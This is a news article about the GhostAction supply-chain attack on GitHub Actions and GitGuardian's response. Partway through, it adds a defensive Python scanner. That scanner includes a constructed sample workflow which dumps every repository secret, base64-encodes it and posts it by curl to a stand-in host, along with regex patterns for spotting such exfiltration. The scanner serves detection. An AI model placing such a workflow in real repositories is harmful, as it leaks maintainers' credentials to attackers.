GitHub supply chain attack sees thousands of tokens and secrets stolen in GhostAction campaign
Hundreds of accounts and thousands of secrets stolen

- GhostAction attack stole 3,325 secrets from 327 GitHub accounts
- GitGuardian helped shut it down and alerted affected projects
- A separate NPM attack hit 2,000 accounts but was unrelated
Thousands of secrets, including PyPI and AWS keys and GitHub tokens, were recently stolen in a supply-chain attack that abused GitHub Actions workflows, dubbed ‘GhostAction’. The attack was spotted by security researchers at GitGuardian, who reported it and helped get the campaign shut down.
GitGuardian’s researchers first spotted the attack when they were notified that a GitHub project called FastUUID had been compromised. The project’s maintainer account had evidently been broken into and used to commit a malicious Actions workflow named “Add Github Actions Security workflow”.
The workflow was designed to harvest the repository’s secrets, including PyPI, npm, DockerHub, GitHub, Cloudflare, and AWS credentials, and send them to an attacker-controlled server.
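A workflow like the one described above only has to do two things: reference the repository’s secrets and ship them somewhere. A practical check is to scan every file under `.github/workflows/` for exactly that combination. The script below is an added example, not code from the article or from GitGuardian, and the two sample workflows in it are constructed for illustration; they are not the actual GhostAction workflow. The trusted-host allow-list is an assumption to be replaced with your own.

```python
import re
from dataclasses import dataclass, field
from pathlib import Path

# Assumption: hosts a legitimate release workflow is expected to talk to.
# Replace with your organisation's own allow-list.
TRUSTED_HOSTS = {"github.com", "api.github.com", "upload.pypi.org", "registry.npmjs.org"}

SECRET_REF = re.compile(r"\$\{\{\s*secrets\.(\w+)\s*\}\}")      # ${{ secrets.NAME }}
ALL_SECRETS = re.compile(r"toJSON\(\s*secrets\s*\)", re.IGNORECASE)  # dumps every secret at once
EXFIL_CMD = re.compile(r"\b(curl|wget|Invoke-WebRequest)\b")
URL_HOST = re.compile(r"https?://([A-Za-z0-9.\-]+)")


@dataclass
class Finding:
    secrets: list = field(default_factory=list)      # individually referenced secret names
    dumps_all_secrets: bool = False                  # toJSON(secrets) present
    outbound_hosts: list = field(default_factory=list)  # URLs pointing outside the allow-list
    suspicious: bool = False


def scan_workflow(text: str) -> Finding:
    """Flag a workflow that touches secrets and has a way to send them off-platform."""
    f = Finding()
    f.secrets = sorted(set(SECRET_REF.findall(text)))
    f.dumps_all_secrets = bool(ALL_SECRETS.search(text))
    f.outbound_hosts = sorted(
        {h.lower() for h in URL_HOST.findall(text) if h.lower() not in TRUSTED_HOSTS}
    )
    has_exfil_tool = bool(EXFIL_CMD.search(text))
    # Serialising the whole secrets context is never needed by a legitimate workflow,
    # so it is flagged on its own; a single secret plus curl to an unknown host needs both.
    f.suspicious = f.dumps_all_secrets or (
        bool(f.secrets) and has_exfil_tool and bool(f.outbound_hosts)
    )
    return f


def scan_repo(repo: Path) -> dict:
    """Scan every workflow file in a checked-out repository; returns {path: Finding}."""
    results = {}
    for pattern in ("*.yml", "*.yaml"):
        for path in (repo / ".github" / "workflows").glob(pattern):
            results[str(path)] = scan_workflow(path.read_text(encoding="utf-8"))
    return results


# Constructed sample: a normal PyPI release workflow.
BENIGN_WORKFLOW = """\
name: Publish to PyPI
on:
  release:
    types: [published]
jobs:
  publish:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: python -m build
      - uses: pypa/gh-action-pypi-publish@release/v1
        with:
          password: ${{ secrets.PYPI_API_TOKEN }}
"""

# Constructed sample of the pattern described in the article (not the real GhostAction workflow):
# every secret is serialised into the environment and posted to an outside host.
MALICIOUS_WORKFLOW = """\
name: Add security workflow
on: [push]
jobs:
  collect:
    runs-on: ubuntu-latest
    env:
      ALL: ${{ toJSON(secrets) }}
    steps:
      - run: |
          echo "$ALL" | base64 -w0 > /tmp/p
          curl -s -X POST --data-binary @/tmp/p https://collector.example.invalid/upload
"""

if __name__ == "__main__":
    for label, wf in (("benign", BENIGN_WORKFLOW), ("malicious", MALICIOUS_WORKFLOW)):
        print(label, scan_workflow(wf))
```

Run `scan_repo(Path("."))` from a clone to review every workflow; anything with `dumps_all_secrets` set deserves an immediate look at the commit that introduced it and a rotation of every secret the repository holds.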
Servers shut down
The researchers reported their findings to PyPI and the project was moved to a read-only state. Soon after, the legitimate account owner regained access and reverted the malicious commit.
The attacker did not react over the following days, which led GitGuardian’s researchers to suspect they were busy compromising other projects. A deeper investigation confirmed this, uncovering 327 compromised accounts and 3,325 leaked secrets.
“Following our impact assessment, we began alerting affected users and projects by creating issues in every compromised repository,” GitGuardian explained in the report. “Among 817 affected repositories, 100 had already reverted the malicious changes. We successfully created issues for 573 of the remaining 717 projects—the others were either deleted or had disabled issues.”
Soon after GhostAction was discovered, the server to which the secrets were being exfiltrated stopped resolving, meaning the campaign was successfully disrupted.
GitGuardian was also alerted to s1ngularity, an npm supply-chain attack that compromised more than 2,000 GitHub accounts and leaked thousands of account tokens and repository secrets. Since both attacks happened at roughly the same time, the researchers speculated that they could be part of the same campaign. Their investigation, however, determined that these were two separate incidents:
“From this initial investigation, we found no intersection between those users and the recent S1ngularity attack campaign's victims. Those two incidents are likely unrelated,” they concluded.
Via BleepingComputer
Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.